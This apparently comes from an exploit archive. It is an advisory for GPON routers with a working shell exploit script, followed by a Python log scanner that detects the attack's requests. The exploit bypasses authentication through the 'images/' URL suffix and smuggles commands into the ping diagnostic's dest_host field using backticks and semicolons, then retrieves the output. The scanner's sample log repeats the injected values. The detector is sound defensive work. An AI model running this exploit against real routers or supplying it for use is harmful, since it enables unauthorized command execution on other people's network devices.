GPON Router Authentication Bypass / Command Injection

GPON routers suffer from authentication bypass and command injection vulnerabilities.

MD5 | 7af9682ee92aebd41743bf56d2a90b85


echo "[+] Sending the Command... "
# We send the command in two modes, backtick (`) and semicolon (;), because different device models trigger on one or the other
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting..."
sleep 3
echo "[+] Retrieving the output..."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
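
A defender-side check for the two request patterns visible in the script above, added here as an example and not part of the original advisory: it flags requests whose query string is "images/" and diag_Form posts whose dest_host is not a plain hostname or IP, which goes beyond the backtick and semicolon cases. The log format, the finding names and the hostname allowlist are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Assumption: a ping target is a bare hostname, IPv4 or IPv6 literal, nothing else.
PLAIN_HOST = re.compile(r"[A-Za-z0-9.:-]{1,253}")

# Constructed sample log (hypothetical format: source method url body).
SAMPLE_LOG = """\
192.0.2.10 POST /GponForm/diag_Form?images/ XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`id`;id&ipv=0
192.0.2.10 GET /diag.html?images/ -
198.51.100.7 POST /GponForm/diag_Form XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=192.0.2.1&ipv=0
198.51.100.7 POST /GponForm/diag_Form XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%60id%60&ipv=0
198.51.100.7 GET /images/logo.png -
"""


def form_fields(body):
    """Split a urlencoded body on '&' only, so a ';' inside a value survives."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def classify(url, body=""):
    """Return the findings for one request to the router's web interface."""
    findings = []
    parts = urlsplit(url)
    # Both requests in the script carry the query string "images/".
    if unquote(parts.query).startswith("images/"):
        findings.append("images-suffix")
    if parts.path.endswith("/GponForm/diag_Form"):
        fields = form_fields(body)
        # Percent-decoding happens first, so encoded metacharacters are caught too.
        if "dest_host" in fields and not PLAIN_HOST.fullmatch(fields["dest_host"]):
            findings.append("dest_host-not-a-host")
    return findings


def scan(log_text):
    """Return (source, url, findings) for every log line with a finding."""
    hits = []
    for line in log_text.splitlines():
        source, _method, url, body = line.split(" ", 3)
        findings = classify(url, "" if body == "-" else body)
        if findings:
            hits.append((source, url, findings))
    return hits
```
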

